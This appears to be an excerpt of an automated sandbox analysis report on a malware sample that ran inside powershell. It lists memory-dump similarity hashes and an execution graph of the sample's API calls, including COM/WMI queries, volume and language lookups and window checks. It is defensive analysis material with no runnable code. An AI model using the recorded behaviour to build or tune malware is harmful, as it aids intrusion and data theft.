                                                                                                                                    • Snapshot File: hcaresult_6_2_77e0000_powershell.jbxd
                                                                                                                                    Similarity
                                                                                                                                    • API ID:
                                                                                                                                    • String ID:
                                                                                                                                    • API String ID:
                                                                                                                                    • Opcode ID: 4172121661266a2e3d9592280e83d76047f586af9b3932d4e2212b14f3bf1f3b
                                                                                                                                    • Instruction ID: e658820aa4cc8c3e4f614b13c2378e9a0b8edd82623cedf13862ce0f843b5373
                                                                                                                                    • Opcode Fuzzy Hash: 4172121661266a2e3d9592280e83d76047f586af9b3932d4e2212b14f3bf1f3b
                                                                                                                                    • Instruction Fuzzy Hash: C5E04FB4A04108EBC704DF94E5409ADBFB8EB49310F1080A99C4427350C6329E51DA90
                                                                                                                                    Memory Dump Source
                                                                                                                                    • Source File: 00000006.00000002.2676237741.00000000077E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 077E0000, based on PE: false
                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                    • Snapshot File: hcaresult_6_2_77e0000_powershell.jbxd
                                                                                                                                    Similarity
                                                                                                                                    • API ID:
                                                                                                                                    • String ID:
                                                                                                                                    • API String ID:
                                                                                                                                    • Opcode ID: 5dd86ee11ae6a3f8d3c1e862513bf83f2492503ff772cb497d09860dd2f37b3b
                                                                                                                                    • Instruction ID: d0d9af42a3e87fab3cbbbeffd522fa7a795b3f0b9865649c993b9da9229db03b
                                                                                                                                    • Opcode Fuzzy Hash: 5dd86ee11ae6a3f8d3c1e862513bf83f2492503ff772cb497d09860dd2f37b3b
                                                                                                                                    • Instruction Fuzzy Hash: E1E0EC74909109EBC704DB94E9419ADBBB8EB8A324F20C1A9D80937345C6329E52DB91
                                                                                                                                    Memory Dump Source
                                                                                                                                    • Source File: 00000006.00000002.2675815829.00000000077B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 077B0000, based on PE: false
                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                    • Snapshot File: hcaresult_6_2_77b0000_powershell.jbxd
                                                                                                                                    Similarity
                                                                                                                                    • API ID:
                                                                                                                                    • String ID:
                                                                                                                                    • API String ID:
                                                                                                                                    • Opcode ID: 68522bc699ecadb9534b6e01ab33ae60f3b990900d393fa3e15a873cdbeada67
                                                                                                                                    • Instruction ID: 1996fac2526f4ea414dec13fd3515b1348b503d897342e88a56b860831ef1f27
                                                                                                                                    • Opcode Fuzzy Hash: 68522bc699ecadb9534b6e01ab33ae60f3b990900d393fa3e15a873cdbeada67
                                                                                                                                    • Instruction Fuzzy Hash: ACD05EB4609108EFC764DB94E940AA9B7A8DB46328F2080AC980C57345CA32AE41DA90
                                                                                                                                    Memory Dump Source
                                                                                                                                    • Source File: 00000006.00000002.2676237741.00000000077E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 077E0000, based on PE: false
                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                    • Snapshot File: hcaresult_6_2_77e0000_powershell.jbxd
                                                                                                                                    Similarity
                                                                                                                                    • API ID:
                                                                                                                                    • String ID:
                                                                                                                                    • API String ID:
                                                                                                                                    • Opcode ID: da323ae2d5a401b4cdac45f41c5a7d3900c955942b38d755ad10ffbb5c44955f
                                                                                                                                    • Instruction ID: 8b81b0688808961b94af326e8b713afcadd49c3fc7b91b279eab12f0f8d9013e
                                                                                                                                    • Opcode Fuzzy Hash: da323ae2d5a401b4cdac45f41c5a7d3900c955942b38d755ad10ffbb5c44955f
                                                                                                                                    • Instruction Fuzzy Hash: 23C08CB404020487C25033E4B409B68769C9B08322F440020E54C225108BB65090C93B
                                                                                                                                    Strings
                                                                                                                                    Memory Dump Source
                                                                                                                                    • Source File: 00000006.00000002.2675815829.00000000077B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 077B0000, based on PE: false
                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                    • Snapshot File: hcaresult_6_2_77b0000_powershell.jbxd
                                                                                                                                    Similarity
                                                                                                                                    • API ID:
                                                                                                                                    • String ID: dhq
                                                                                                                                    • API String ID: 0-2324836203
                                                                                                                                    • Opcode ID: 1e862a863648256a5a8445d62c0bfcabcb0ef79241ad0c1836bd0222469e7bf8
                                                                                                                                    • Instruction ID: 9a425eaaf18097452678735d3b9e3fc4210f574a89bbda2682633650796ca2e8
                                                                                                                                    • Opcode Fuzzy Hash: 1e862a863648256a5a8445d62c0bfcabcb0ef79241ad0c1836bd0222469e7bf8
                                                                                                                                    • Instruction Fuzzy Hash: 5A9104B4A05218CFDB20DFA9D854BEDBBF2FB49341F1081A9D409AB350DB745989CF45
                                                                                                                                    Memory Dump Source
                                                                                                                                    • Source File: 00000006.00000002.2675815829.00000000077B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 077B0000, based on PE: false
                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                    • Snapshot File: hcaresult_6_2_77b0000_powershell.jbxd
                                                                                                                                    Similarity
                                                                                                                                    • API ID:
                                                                                                                                    • String ID:
                                                                                                                                    • API String ID:
                                                                                                                                    • Opcode ID: 09c38bb0ff274907b06390c545e225f755e542f95b611524cece967d034c781a
                                                                                                                                    • Instruction ID: f65373b22a4d317bd10e82d589a04ed238ee78e1ca5b0c0dce3e544992f1a940
                                                                                                                                    • Opcode Fuzzy Hash: 09c38bb0ff274907b06390c545e225f755e542f95b611524cece967d034c781a
                                                                                                                                    • Instruction Fuzzy Hash: A45144B4A16218CFDB20CFA8D548BEDBBF2FB4A350F10512AD405BB341C7B45945CB45
                                                                                                                                    Memory Dump Source
                                                                                                                                    • Source File: 00000006.00000002.2675815829.00000000077B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 077B0000, based on PE: false
                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                    • Snapshot File: hcaresult_6_2_77b0000_powershell.jbxd
                                                                                                                                    Similarity
                                                                                                                                    • API ID:
                                                                                                                                    • String ID:
                                                                                                                                    • API String ID:
                                                                                                                                    • Opcode ID: 96427c961dcab40d30928017bbcdef4cc53575f3c6ee05d4db93ddc84a401d5d
                                                                                                                                    • Instruction ID: 9e91c9ec14bdba5c97b21f39ae5378b937bb9722ce09f1d32031657a5b3b5ebc
                                                                                                                                    • Opcode Fuzzy Hash: 96427c961dcab40d30928017bbcdef4cc53575f3c6ee05d4db93ddc84a401d5d
                                                                                                                                    • Instruction Fuzzy Hash: CF5115B4A16218CFEB20CFA8D548BEDBBF6FB4A350F50512AD40AAB381C7B45945CF45
                                                                                                                                    Strings
                                                                                                                                    Memory Dump Source
                                                                                                                                    • Source File: 00000006.00000002.2679169572.0000000007AE0000.00000040.00000800.00020000.00000000.sdmp, Offset: 07AE0000, based on PE: false
                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                    • Snapshot File: hcaresult_6_2_7ae0000_powershell.jbxd
                                                                                                                                    Similarity
                                                                                                                                    • API ID:
                                                                                                                                    • String ID: (odq$(odq$4'dq$4'dq$4cl$4cl$Xbdl$Xbdl$tPdq$tPdq$$dq$$dq$$dq$$dq$$dq$$dq$$dq$$dq$$dq$$dq
                                                                                                                                    • API String ID: 0-699773606
                                                                                                                                    • Opcode ID: 3753f55195b541139ff838b5dc4e5b74cf8b34f2a79c0400e645d84b15fa7f6d
                                                                                                                                    • Instruction ID: 365130406a91e905888279bdb45700a4d80eecbbb93ed2be8c40bbd7529a8fb4
                                                                                                                                    • Opcode Fuzzy Hash: 3753f55195b541139ff838b5dc4e5b74cf8b34f2a79c0400e645d84b15fa7f6d
                                                                                                                                    • Instruction Fuzzy Hash: EF0203B1B0020ADFDF25CF69D8547AB7BB6AFC5311F14806AE9258B291CB71DD40CBA1
                                                                                                                                    Strings
                                                                                                                                    Memory Dump Source
                                                                                                                                    • Source File: 00000006.00000002.2679169572.0000000007AE0000.00000040.00000800.00020000.00000000.sdmp, Offset: 07AE0000, based on PE: false
                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                    • Snapshot File: hcaresult_6_2_7ae0000_powershell.jbxd
                                                                                                                                    Similarity
                                                                                                                                    • API ID:
                                                                                                                                    • String ID: 4'dq$4'dq$4'dq$4'dq$$dq$$dq$$dq$$dq$$dq$$dq
                                                                                                                                    • API String ID: 0-4287419856
                                                                                                                                    • Opcode ID: c4603d7a1229f6967bca5a0df0cc021e09f4e27a4bffff43ad23c2c9f0bab7aa
                                                                                                                                    • Instruction ID: 5b3f9310e77e5a2eddf43859ec4f34c916fd3186e87c10110d6357a054ac0ca1
                                                                                                                                    • Opcode Fuzzy Hash: c4603d7a1229f6967bca5a0df0cc021e09f4e27a4bffff43ad23c2c9f0bab7aa
                                                                                                                                    • Instruction Fuzzy Hash: 8FB1B1B1B1460ACFCB148F69D8547AA77BEBFC5310F24806AD8258B2D1DB31D981CBA1
                                                                                                                                    Strings
                                                                                                                                    Memory Dump Source
                                                                                                                                    • Source File: 00000006.00000002.2679169572.0000000007AE0000.00000040.00000800.00020000.00000000.sdmp, Offset: 07AE0000, based on PE: false
                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                    • Snapshot File: hcaresult_6_2_7ae0000_powershell.jbxd
                                                                                                                                    Similarity
                                                                                                                                    • API ID:
                                                                                                                                    • String ID: 4'dq$84dl$tPdq$$dq$$dq$$dq$$dq$$dq
                                                                                                                                    • API String ID: 0-2226365686
                                                                                                                                    • Opcode ID: aecac83f3482095d4f0c48d13666161c1597a03c00e69f52face6f9788143c18
                                                                                                                                    • Instruction ID: 828e6959b867de2cb775987296c3f9347f3b050af3b03afb9a7a5e8c6ee23db4
                                                                                                                                    • Opcode Fuzzy Hash: aecac83f3482095d4f0c48d13666161c1597a03c00e69f52face6f9788143c18
                                                                                                                                    • Instruction Fuzzy Hash: 85515FB0A00A0ADFDB24CF19C544BA6B7BEFB89711F198169E825AB2D1C771DD40CF61
                                                                                                                                    Strings
                                                                                                                                    Memory Dump Source
                                                                                                                                    • Source File: 00000006.00000002.2679169572.0000000007AE0000.00000040.00000800.00020000.00000000.sdmp, Offset: 07AE0000, based on PE: false
                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                    • Snapshot File: hcaresult_6_2_7ae0000_powershell.jbxd
                                                                                                                                    Similarity
                                                                                                                                    • API ID:
                                                                                                                                    • String ID: 4'dq$4'dq$4'dq$4'dq$Pqdq$x.Wk$-Wk
                                                                                                                                    • API String ID: 0-1648521316
                                                                                                                                    • Opcode ID: 2e85e0604225d99fdc12a532cf680ccb486db22bb8ec73338d7ac12e77f30213
                                                                                                                                    • Instruction ID: db08e0ab629f88c852a1a7150af8837ade877d09d122a9a2114893a39cd93fad
                                                                                                                                    • Opcode Fuzzy Hash: 2e85e0604225d99fdc12a532cf680ccb486db22bb8ec73338d7ac12e77f30213
                                                                                                                                    • Instruction Fuzzy Hash: 14226074B002159FDB24DB58C851BAEBBB2AF85304F14C4A9E909AF751CB71ED82CF91
                                                                                                                                    Strings
                                                                                                                                    Memory Dump Source
                                                                                                                                    • Source File: 00000006.00000002.2679169572.0000000007AE0000.00000040.00000800.00020000.00000000.sdmp, Offset: 07AE0000, based on PE: false
                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                    • Snapshot File: hcaresult_6_2_7ae0000_powershell.jbxd
                                                                                                                                    Similarity
                                                                                                                                    • API ID:
                                                                                                                                    • String ID: 84dl$84dl$tPdq$$dq$$dq$$dq
                                                                                                                                    • API String ID: 0-2903811780
                                                                                                                                    • Opcode ID: 3290eef387ae3f2394e7b3a04a5330d6b3e24c65cb6e96027d641b4ec9dc2912
                                                                                                                                    • Instruction ID: a1d98c44c9dcaaa2558eae713c4cdb99a6128813980775b22f7195eaaf12a6d8
                                                                                                                                    • Opcode Fuzzy Hash: 3290eef387ae3f2394e7b3a04a5330d6b3e24c65cb6e96027d641b4ec9dc2912
                                                                                                                                    • Instruction Fuzzy Hash: 7C8105B1600606DFCB24CF19D945BAABBBDFFC5311F18846AE8649B2D1C731D980CB51
                                                                                                                                    Strings
                                                                                                                                    Memory Dump Source
                                                                                                                                    • Source File: 00000006.00000002.2675815829.00000000077B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 077B0000, based on PE: false
                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                    • Snapshot File: hcaresult_6_2_77b0000_powershell.jbxd
                                                                                                                                    Similarity
                                                                                                                                    • API ID:
                                                                                                                                    • String ID: (hq$4'dq$4'dq$4'dq$4'dq$phq
                                                                                                                                    • API String ID: 0-3112631775
                                                                                                                                    • Opcode ID: 97f6d4c6c7d2cab218c5afd2c9a88fad6458f79b30eaecffbf16e474c8f844e3
                                                                                                                                    • Instruction ID: f9a49fcbe9706fc57ae9b113387335f308cc00331310368562a685c99ef169eb
                                                                                                                                    • Opcode Fuzzy Hash: 97f6d4c6c7d2cab218c5afd2c9a88fad6458f79b30eaecffbf16e474c8f844e3
                                                                                                                                    • Instruction Fuzzy Hash: B161B5B1A002059FCB09DFA9C8506EEBBB7FFC8300F148869D5099B755DF31AD069BA1
                                                                                                                                    Strings
                                                                                                                                    Memory Dump Source
                                                                                                                                    • Source File: 00000006.00000002.2679169572.0000000007AE0000.00000040.00000800.00020000.00000000.sdmp, Offset: 07AE0000, based on PE: false
                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                    • Snapshot File: hcaresult_6_2_7ae0000_powershell.jbxd
                                                                                                                                    Similarity
                                                                                                                                    • API ID:
                                                                                                                                    • String ID: 4'dq$4'dq$84dl$TQiq$TQiq$tPdq
                                                                                                                                    • API String ID: 0-1643887291
                                                                                                                                    • Opcode ID: 47bae9765bc2379f6eb8bf727e87134ea0d98fd4ab686f0dc12b1a142a06da90
                                                                                                                                    • Instruction ID: 1cfee0a5d59dad4efb3b66037b1f805bd56685125dc21f100d4bd6ab4a42bfbb
                                                                                                                                    • Opcode Fuzzy Hash: 47bae9765bc2379f6eb8bf727e87134ea0d98fd4ab686f0dc12b1a142a06da90
                                                                                                                                    • Instruction Fuzzy Hash: DC419FB0A00305DFDF248F49C444BABB7BAAB85311F19846AD825AB290C771ED80CB96
                                                                                                                                    Strings
                                                                                                                                    Memory Dump Source
                                                                                                                                    • Source File: 00000006.00000002.2674865150.00000000075D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 075D0000, based on PE: false
                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                    • Snapshot File: hcaresult_6_2_75d0000_powershell.jbxd
                                                                                                                                    Similarity
                                                                                                                                    • API ID:
                                                                                                                                    • String ID: 4'dq$4'dq$h2Yk$x.Wk$-Wk
                                                                                                                                    • API String ID: 0-2399227493
                                                                                                                                    • Opcode ID: 3701f7085ff8576033d71cb48345c2cd32ae70327ede5cbf3560024f3c98fd3f
                                                                                                                                    • Instruction ID: cbcf1a8a0974be98003558f5d6036249969933c64420838a66f96efdf07693dc
                                                                                                                                    • Opcode Fuzzy Hash: 3701f7085ff8576033d71cb48345c2cd32ae70327ede5cbf3560024f3c98fd3f
                                                                                                                                    • Instruction Fuzzy Hash: 7B0296B0A002198FDB24DB58C851BEDB7B6FF85304F1085A5D609AF741DB71AE81CF95
                                                                                                                                    Strings
                                                                                                                                    Memory Dump Source
                                                                                                                                    • Source File: 00000006.00000002.2679169572.0000000007AE0000.00000040.00000800.00020000.00000000.sdmp, Offset: 07AE0000, based on PE: false
                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                    • Snapshot File: hcaresult_6_2_7ae0000_powershell.jbxd
                                                                                                                                    Similarity
                                                                                                                                    • API ID:
                                                                                                                                    • String ID: 4'dq$4'dq$$dq$$dq$$dq
                                                                                                                                    • API String ID: 0-2509493698
                                                                                                                                    • Opcode ID: 083d589c2acba8e5a76ddfcabd27488462b1ca28ad31ff4c094536c9474b240e
                                                                                                                                    • Instruction ID: 313454a1767ee9c75e3b4cfa426ae1e5147eeef81dfa7bda4b7b0da959a10b5c
                                                                                                                                    • Opcode Fuzzy Hash: 083d589c2acba8e5a76ddfcabd27488462b1ca28ad31ff4c094536c9474b240e
                                                                                                                                    • Instruction Fuzzy Hash: 2691F4B5B042058FCB21DB69D4406BABBFAEFC6221F14C07AD565CB251DB32C946CBA1
                                                                                                                                    Strings
                                                                                                                                    Memory Dump Source
                                                                                                                                    • Source File: 00000006.00000002.2679169572.0000000007AE0000.00000040.00000800.00020000.00000000.sdmp, Offset: 07AE0000, based on PE: false
                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                    • Snapshot File: hcaresult_6_2_7ae0000_powershell.jbxd
                                                                                                                                    Similarity
                                                                                                                                    • API ID:
                                                                                                                                    • String ID: 4'dq$$dq$$dq$$dq$$dq
                                                                                                                                    • API String ID: 0-206161847
                                                                                                                                    • Opcode ID: 16909de5f2a8591713ad18c14369efecbca71d4a36f37a4f37de72beaddbab44
                                                                                                                                    • Instruction ID: 46129350d3d16aff1cc04c15fa09cf00b6bf26f4fa94c049493eeceafdac312a
                                                                                                                                    • Opcode Fuzzy Hash: 16909de5f2a8591713ad18c14369efecbca71d4a36f37a4f37de72beaddbab44
                                                                                                                                    • Instruction Fuzzy Hash: 2B51C7F061120BDFCF2ACF19D9046AA7BB9BF81352F1480A6E8258B291C735DD84CB61
                                                                                                                                    Strings
                                                                                                                                    Memory Dump Source
                                                                                                                                    • Source File: 00000006.00000002.2679169572.0000000007AE0000.00000040.00000800.00020000.00000000.sdmp, Offset: 07AE0000, based on PE: false
                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                    • Snapshot File: hcaresult_6_2_7ae0000_powershell.jbxd
                                                                                                                                    Similarity
                                                                                                                                    • API ID:
                                                                                                                                    • String ID: (odq$(odq$4'dq$84dl$tPdq
                                                                                                                                    • API String ID: 0-1847832596
                                                                                                                                    • Opcode ID: a6fb186c8e924ba12e1d69807956f7a61e707b9b0ea26c094fada00caa623762
                                                                                                                                    • Instruction ID: 4105be90568d21880374fa5f3188842e2c9032e82015e728c13e955bfa2efc4a
                                                                                                                                    • Opcode Fuzzy Hash: a6fb186c8e924ba12e1d69807956f7a61e707b9b0ea26c094fada00caa623762
                                                                                                                                    • Instruction Fuzzy Hash: E041FAB1A09345DFC711CB588544AABBFB6AFC6310F19C0AAE9249F292C771ED44C763
                                                                                                                                    Strings
                                                                                                                                    Memory Dump Source
                                                                                                                                    • Source File: 00000006.00000002.2679169572.0000000007AE0000.00000040.00000800.00020000.00000000.sdmp, Offset: 07AE0000, based on PE: false
                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                    • Snapshot File: hcaresult_6_2_7ae0000_powershell.jbxd
                                                                                                                                    Similarity
                                                                                                                                    • API ID:
                                                                                                                                    • String ID: 4'dq$$dq$$dq$$dq$$dq
                                                                                                                                    • API String ID: 0-206161847
                                                                                                                                    • Opcode ID: 3f8d0b1ce73333466d9bb706a29c57fbbb4076691b273be768818cae5ab3f413
                                                                                                                                    • Instruction ID: ef256f44c392e594e0cecf67de2688cfe04a4c0ce1d9e6594e0a5f941bb4f3e5
                                                                                                                                    • Opcode Fuzzy Hash: 3f8d0b1ce73333466d9bb706a29c57fbbb4076691b273be768818cae5ab3f413
                                                                                                                                    • Instruction Fuzzy Hash: 47416AF0610A0ADFDB28CF19D9447AA37BEBB81311F548066E8258B1D1D775D984CB61
                                                                                                                                    Strings
                                                                                                                                    Memory Dump Source
                                                                                                                                    • Source File: 00000006.00000002.2679169572.0000000007AE0000.00000040.00000800.00020000.00000000.sdmp, Offset: 07AE0000, based on PE: false
                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                    • Snapshot File: hcaresult_6_2_7ae0000_powershell.jbxd
                                                                                                                                    Similarity
                                                                                                                                    • API ID:
                                                                                                                                    • String ID: 4'dq$$dq$$dq$Lfl$Lfl
                                                                                                                                    • API String ID: 0-281353100
                                                                                                                                    • Opcode ID: f855f0519dcf94aa1378002188809cbc79450173d23f8bf0482bfaecaa79ba18
                                                                                                                                    • Instruction ID: acd686587085475f3af6ddc97cdd1eee3950ac87836f263b15702c876feed72b
                                                                                                                                    • Opcode Fuzzy Hash: f855f0519dcf94aa1378002188809cbc79450173d23f8bf0482bfaecaa79ba18
                                                                                                                                    • Instruction Fuzzy Hash: 1121BFF6A10306DBDB24CF2AC64167A77BDABC8604F24407AC9248B244EB75C940CFA6
                                                                                                                                    Strings
                                                                                                                                    Memory Dump Source
                                                                                                                                    • Source File: 00000006.00000002.2675815829.00000000077B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 077B0000, based on PE: false
                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                    • Snapshot File: hcaresult_6_2_77b0000_powershell.jbxd
                                                                                                                                    Similarity
                                                                                                                                    • API ID:
                                                                                                                                    • String ID: (hq$(hq$Hhq$Hhq
                                                                                                                                    • API String ID: 0-3970602178
                                                                                                                                    • Opcode ID: 2928507120ac78fea90ec50f47275d722f83c75a831152bf1803f7fc1f22636d
                                                                                                                                    • Instruction ID: e5350e1c11199404656863791f7885290fc899a6b749d6c2898dc673dd758d84
                                                                                                                                    • Opcode Fuzzy Hash: 2928507120ac78fea90ec50f47275d722f83c75a831152bf1803f7fc1f22636d
                                                                                                                                    • Instruction Fuzzy Hash: 7CD1E0B47002499FCB15DF29C494AEE7BA2FF85350F558969E8058F3A1CB30EC42CB91
                                                                                                                                    Strings
                                                                                                                                    Memory Dump Source
                                                                                                                                    • Source File: 00000006.00000002.2679169572.0000000007AE0000.00000040.00000800.00020000.00000000.sdmp, Offset: 07AE0000, based on PE: false
                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                    • Snapshot File: hcaresult_6_2_7ae0000_powershell.jbxd
                                                                                                                                    Similarity
                                                                                                                                    • API ID:
                                                                                                                                    • String ID: 84dl$84dl$tPdq$tPdq
                                                                                                                                    • API String ID: 0-3081460363
                                                                                                                                    • Opcode ID: 654b2630bac4c4999c6ecd62d42b2cc675470631f27b05bb6516ceafbf0f5abb
                                                                                                                                    • Instruction ID: c4d691e604ef44310b7776c1cb38d03f4f3c5bc26baad1540436535c272e447a
                                                                                                                                    • Opcode Fuzzy Hash: 654b2630bac4c4999c6ecd62d42b2cc675470631f27b05bb6516ceafbf0f5abb
                                                                                                                                    • Instruction Fuzzy Hash: FA914AB2B04245DFCF119F69941066BBBF9AFCA210F2480BBE955CF291DB31D941C7A1
                                                                                                                                    Strings
                                                                                                                                    Memory Dump Source
                                                                                                                                    • Source File: 00000006.00000002.2679169572.0000000007AE0000.00000040.00000800.00020000.00000000.sdmp, Offset: 07AE0000, based on PE: false
                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                    • Snapshot File: hcaresult_6_2_7ae0000_powershell.jbxd
                                                                                                                                    Similarity
                                                                                                                                    • API ID:
                                                                                                                                    • String ID: 84dl$LRdq$LRdq$tPdq
                                                                                                                                    • API String ID: 0-1490063149
                                                                                                                                    • Opcode ID: 4127c83f3b75184c47d2487362d2174a21f56b7bc37810195c9267d1215c793c
                                                                                                                                    • Instruction ID: 7800820da5213d1bfdfb3215ce2e7f292f3992df7c3b9252d640d4e514a4591a
                                                                                                                                    • Opcode Fuzzy Hash: 4127c83f3b75184c47d2487362d2174a21f56b7bc37810195c9267d1215c793c
                                                                                                                                    • Instruction Fuzzy Hash: 1A71D6B4704206DFEB24CF19C540AAA7BFABFC5710F18846AEC159B291D772DD40CBA5
                                                                                                                                    Strings
                                                                                                                                    Memory Dump Source
                                                                                                                                    • Source File: 00000006.00000002.2679169572.0000000007AE0000.00000040.00000800.00020000.00000000.sdmp, Offset: 07AE0000, based on PE: false
                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                    • Snapshot File: hcaresult_6_2_7ae0000_powershell.jbxd
                                                                                                                                    Similarity
                                                                                                                                    • API ID:
                                                                                                                                    • String ID: 4'dq$4'dq$84dl$tPdq
                                                                                                                                    • API String ID: 0-3913231027
                                                                                                                                    • Opcode ID: aa9cde423e464b8273c4bacc5b646c1b3d982835f35467c2c8fa54d9e25d6def
                                                                                                                                    • Instruction ID: e06a8a1dd81a7420a06c531af224c86b06c432d24d9300985563e8059fd0c2b4
                                                                                                                                    • Opcode Fuzzy Hash: aa9cde423e464b8273c4bacc5b646c1b3d982835f35467c2c8fa54d9e25d6def
                                                                                                                                    • Instruction Fuzzy Hash: F34162B0B003059BDB24CF59C554BABB7FAABC9710F18C066E8259B291D771EC45CB63
                                                                                                                                    Strings
                                                                                                                                    Memory Dump Source
                                                                                                                                    • Source File: 00000006.00000002.2679169572.0000000007AE0000.00000040.00000800.00020000.00000000.sdmp, Offset: 07AE0000, based on PE: false
                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                    • Snapshot File: hcaresult_6_2_7ae0000_powershell.jbxd
                                                                                                                                    Similarity
                                                                                                                                    • API ID:
                                                                                                                                    • String ID: $dq$$dq$$dq$$dq
                                                                                                                                    • API String ID: 0-185584874
                                                                                                                                    • Opcode ID: bb86bd3116f3f45da17f8253d8be4868726241bc12de2e279c0dedd40b363eac
                                                                                                                                    • Instruction ID: 7d05443ea4f525f3044713d8a2a9222d0a79a0535fb7fa72ea86f1325d6c1320
                                                                                                                                    • Opcode Fuzzy Hash: bb86bd3116f3f45da17f8253d8be4868726241bc12de2e279c0dedd40b363eac
                                                                                                                                    • Instruction Fuzzy Hash: 552149B17103065BDB349A6D9840737B7AEDFC5712F34803AE519CB281DDB5C8418BA1
                                                                                                                                    Strings
                                                                                                                                    Memory Dump Source
                                                                                                                                    • Source File: 00000006.00000002.2679169572.0000000007AE0000.00000040.00000800.00020000.00000000.sdmp, Offset: 07AE0000, based on PE: false
                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                    • Snapshot File: hcaresult_6_2_7ae0000_powershell.jbxd
                                                                                                                                    Similarity
                                                                                                                                    • API ID:
                                                                                                                                    • String ID: 4'dq$4'dq$$dq$$dq
                                                                                                                                    • API String ID: 0-4229963660
                                                                                                                                    • Opcode ID: 7852ee18b4a11d57e5f3b032508777a1f7633bedc2bc13a893eecafc554917e6
                                                                                                                                    • Instruction ID: 9be342ed279f8ec123f41ad169aec13f46507d44a281989e7e0e130c7fbafc59
                                                                                                                                    • Opcode Fuzzy Hash: 7852ee18b4a11d57e5f3b032508777a1f7633bedc2bc13a893eecafc554917e6
                                                                                                                                    • Instruction Fuzzy Hash: FF01F77171A3865FC72A566868212AB6FB69FC3510B3941ABD090CFAC3CD644D4583B7

                                                                                                                                    Execution Graph

                                                                                                                                    Execution Coverage:8.3%
                                                                                                                                    Dynamic/Decrypted Code Coverage:0%
                                                                                                                                    Signature Coverage:25.7%
                                                                                                                                    Total number of Nodes:292
                                                                                                                                    Total number of Limit Nodes:8
                                                                                                                                    execution_graph 13436 42d7e3 13437 42d7ee 13436->13437 13440 437c10 13437->13440 13441 437c30 13440->13441 13443 437cae 13441->13443 13449 43c1f0 LdrInitializeThunk 13441->13449 13444 42d7fc 13443->13444 13446 437d2e 13443->13446 13448 43c1f0 LdrInitializeThunk 13443->13448 13446->13444 13450 43c1f0 LdrInitializeThunk 13446->13450 13448->13446 13449->13443 13450->13444 13296 40c583 CoInitializeSecurity 13451 43c767 13452 43c790 13451->13452 13452->13452 13453 43c80e 13452->13453 13455 43c1f0 LdrInitializeThunk 13452->13455 13455->13453 13456 43cce6 13457 43cd00 13456->13457 13458 43cd6e 13457->13458 13463 43c1f0 LdrInitializeThunk 13457->13463 13462 43c1f0 LdrInitializeThunk 13458->13462 13461 43ce4d 13462->13461 13463->13458 13297 436145 13301 43dbf0 13297->13301 13299 43615d GetUserDefaultUILanguage 13300 436188 13299->13300 13302 43c58a 13304 43c460 13302->13304 13303 43c5f4 13304->13303 13304->13304 13307 43c1f0 LdrInitializeThunk 13304->13307 13306 43c54d 13307->13306 13464 4217ab 13465 4217d0 13464->13465 13466 4218a0 2 API calls 13465->13466 13467 42180b 13466->13467 13468 4218a0 2 API calls 13467->13468 13469 42182a 13468->13469 13470 430469 CoSetProxyBlanket 13308 43c2c8 13309 43c2e0 13308->13309 13309->13309 13310 43ccaf GetForegroundWindow 13309->13310 13311 43ccbe 13310->13311 13312 40d38e 13313 40d3b0 13312->13313 13316 437df0 13313->13316 13315 40d4e2 13315->13315 13317 437e10 CoCreateInstance 13316->13317 13319 438042 SysAllocString 13317->13319 13320 438440 13317->13320 13323 4380e7 13319->13323 13322 438450 GetVolumeInformationW 13320->13322 13331 438471 13322->13331 13324 43842f SysFreeString 13323->13324 13325 4380ef CoSetProxyBlanket 13323->13325 13324->13320 13326 438425 13325->13326 13327 43810f SysAllocString 13325->13327 13326->13324 13329 438200 13327->13329 13329->13329 13330 438237 SysAllocString 13329->13330 13334 43825b 13330->13334 13331->13315 13332 438413 SysFreeString SysFreeString 13332->13326 13333 438409 SysFreeString 13333->13332 13334->13332 13334->13333 13335 4382a3 VariantInit 13334->13335 13337 4382f0 13335->13337 13336 4383f8 VariantClear 13336->13333 13337->13336 13338 42c84d 13340 42c880 13338->13340 13339 42c97e 13340->13339 13342 43c1f0 LdrInitializeThunk 13340->13342 13342->13339 13343 408850 13345 40885f 13343->13345 13344 408acf ExitProcess 13345->13344 13346 408ab8 13345->13346 13347 40891c GetCurrentProcessId GetCurrentThreadId 13345->13347 13356 43c160 13346->13356 13348 408941 13347->13348 13349 408945 SHGetSpecialFolderPathW GetForegroundWindow 13347->13349 13348->13349 13351 408a3d 13349->13351 13351->13346 13355 40c550 CoInitializeEx 13351->13355 13359 43d7f0 13356->13359 13358 43c165 FreeLibrary 13358->13344 13360 43d7f9 13359->13360 13360->13358 13361 421853 13362 421860 13361->13362 13362->13362 13365 4218a0 13362->13365 13366 4218b7 13365->13366 13378 43e340 13366->13378 13368 4219fc 13375 421ff5 13368->13375 13383 43c1f0 LdrInitializeThunk 13368->13383 13384 43aaa0 13368->13384 13370 